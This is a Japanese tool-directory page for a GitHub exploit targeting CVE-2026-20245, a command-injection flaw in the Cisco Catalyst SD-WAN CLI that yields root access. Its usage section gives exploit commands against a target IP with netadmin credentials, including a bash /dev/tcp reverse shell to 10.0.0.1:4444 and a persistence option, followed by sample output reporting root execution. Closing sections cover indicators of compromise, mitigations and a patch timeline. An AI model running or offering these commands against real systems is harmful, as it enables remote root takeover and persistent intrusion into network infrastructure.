Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2026-20245---Cisco-SD-WAN-Privilege-Escalation-Exploit — **このコードは教育目的および許可されたセキュリティテスト専用です。** | Kitploit
ツール/GitHubGitHub/fevar54/cve-2026-20245---cisco-sd-wan-privilege-escalation-exploit
特権昇格脆弱性分析エクスプロイトウェブアプリケーション悪用ネットワークセキュリティペネトレーションテストコマンド&コントロール学習と教育

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有
GitHub
fevar54/cve-2026-20245---cisco-sd-wan-privilege-escalation-exploit

CVE-2026-20245---Cisco-SD-WAN-Privilege-Escalation-Exploit

**このコードは教育目的および許可されたセキュリティテスト専用です。**

リポジトリを見る
343ヶ月前未レビュー

CVE-2026-20245 - Cisco SD-WAN Privilege Escalation Exploit

Security Rating CVSS CISA KEV

⚠️ 警告

このコードは教育目的および許可されたセキュリティテストのみを対象としています。

📋 説明

CVE-2026-20245 は、Cisco Catalyst SD-WAN Controller (vSmart)、Cisco Catalyst SD-WAN Manager (vManage)、Cisco Catalyst SD-WAN Validator (vBond) の CLI における 権限昇格 の脆弱性です。認証された netadmin 権限を持つ攻撃者が、特別に細工されたファイルをアップロードすることで、root として任意のコマンドを実行できる可能性があります。

技術的詳細

フィールド値
CVECVE-2026-20245
CVSS7.8 (High)
ベクターAV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
コンポーネントCLI / CSV Upload
タイプCommand Injection (CWE-116)

🎯 影響を受けるバージョン

製品脆弱なバージョン
Cisco Catalyst SD-WAN Manager< 20.18.3.1
Cisco Catalyst SD-WAN Controller (vSmart)< 20.18.3.1
Cisco Catalyst SD-WAN Validator (vBond)< 20.18.3.1

具体的な脆弱なバージョン:

  • 20.9.x (全て)
  • 20.10.x - 20.12.5.3
  • 20.12.6 - 20.12.6.1
  • 20.12.7
  • 20.13.x - 20.15.4.3
  • 20.15.5 - 20.15.5.1
  • 20.16.x - 20.18.2.1

🔧 インストール

root@kitploit:~
# Clonar repositorio
git clone https://github.com/username/CVE-2026-20245-PoC
cd CVE-2026-20245-PoC

# Instalar dependencias
pip install -r requirements.txt

# Dar permisos
chmod +x exploit.py

📦 依存関係

root@kitploit:~
requests>=2.31.0

🚀 使用方法

バージョンを確認

root@kitploit:~
python3 exploit.py -t 192.168.1.1 -u netadmin -p password --check-only

コマンドを実行

root@kitploit:~
python3 exploit.py -t 192.168.1.1 -u netadmin -p password -c "id"

リバースシェル

root@kitploit:~
python3 exploit.py -t 192.168.1.1 -u netadmin -p password -c "bash -i >& /dev/tcp/10.0.0.1/4444 0>&1"

永続化をインストール

root@kitploit:~
python3 exploit.py -t 192.168.1.1 -u netadmin -p password -c "whoami" --persist

🔍 期待される出力

root@kitploit:~
╔═══════════════════════════════════════════════════════════════════╗
║  CVE-2026-20245 - Cisco SD-WAN Privilege Escalation Exploit     ║
║  Command Injection via Crafted File Upload                       ║
║  CVSS: 7.8 (High) | CISA KEV: 2026-06-09                        ║
╚═══════════════════════════════════════════════════════════════════╝

[*] Authenticating to 192.168.1.1...
[+] Authentication successful
[+] XSRF Token obtained
[*] Attempting to execute: id
[*] Trying endpoint: /system/device/upload
[*] Uploading malicious file...
[+] File uploaded successfully
[*] Triggering command injection...
[+] Trigger response: 200
[+] Command injection successful via /system/device/upload

============================================================
[✓] EXPLOIT SUCCESSFUL
[✓] Command executed as root
[!] System is VULNERABLE - Apply Cisco patch immediately
============================================================

🔍 侵害指標(IOC)

ログの確認 (/var/log/scripts.log)

root@kitploit:~
# Buscar actividad sospechosa
grep -E "\.csv|malicious|upload_serial" /var/log/scripts.log

# Comandos específicos a buscar
Apr 15 09:44:57 vmanage vScript: /usr/bin/vconfd_script_upload_tenant_list.sh -cli path /home/admin/malicious.csv

疑わしいファイル

  • /home/admin/*.csv (不正なCSVファイル)
  • /tmp/*.csv
  • /var/log/scripts.log に不審なエントリ

プロセス

root@kitploit:~
# Buscar procesos root inusuales
ps aux | grep -E "bash|sh|nc|ncat|socat"

🛡️ 緩和策

オプション1 - 修正バージョンに更新する(推奨)

バージョン修正リリース
20.18.2.1 およびそれ以前20.18.3.1

オプション2 - アクセスを制限する

  • 管理アクセスを管理ネットワークに制限する
  • 多要素認証を使用する
  • CSV アップロードアクティビティを監視する

オプション3 - 安全な設定

root@kitploit:~
# Deshabilitar upload de serial numbers si no es necesario
no feature upload-serial-numbers

# Limitar privilegios netadmin
admin privilege restrict

📚 参考文献

  • Cisco Security Advisory
  • NVD - CVE-2026-20245
  • CISA KEV Catalog

📊 タイムライン

日付イベント
2026-05-14Cisco が最初のアドバイザリを公開
2026-06-04CVE が正式に公開
2026-06-09CISA が KEV に追加
2026-06-23CISA のパッチ適用期限

⚖️ 免責事項

このソフトウェアは「現状のまま」提供され、いかなる保証もありません。著者は不正使用について一切の責任を負いません。許可されたシステムでのみ使用してください。

ツールをダウンロード